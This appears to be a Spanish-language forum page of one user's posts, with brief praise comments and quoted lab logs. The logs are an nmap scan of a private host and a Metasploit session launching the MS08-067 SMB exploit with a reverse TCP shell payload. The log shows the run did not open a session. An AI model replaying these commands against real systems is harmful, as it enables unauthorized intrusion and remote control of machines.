muy buen proyecto... estaria bueno podes hacer un diagrama de flujo o un esquema para poder entender a grandes rasgos como funciona... creo q el objetivo es apreder..
Muy buen proyecto
Muy buen proyecto
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú
Muy buen proyecto
CitarStarting Nmap 5.00 ( http://nmap.org ) at 2010-02-21 23:21 ART
Interesting ports on 192.168.1.100:
Not shown: 996 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
2869/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds
Citar
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 524 exploits - 246 auxiliary
+ -- --=[ 193 payloads - 23 encoders - 8 nops
=[ svn r8578 updated today (2010.02.21)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.100 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.100 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 192.168.1.102 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
- Started reverse handler on 192.168.1.102:4444
- Automatically detecting the target...
- Fingerprint: Windows XP Service Pack 3 - lang:Spanish
- Selected Target: Windows XP SP3 Spanish (NX)
- Triggering the vulnerability...
- Exploit completed, but no session was created.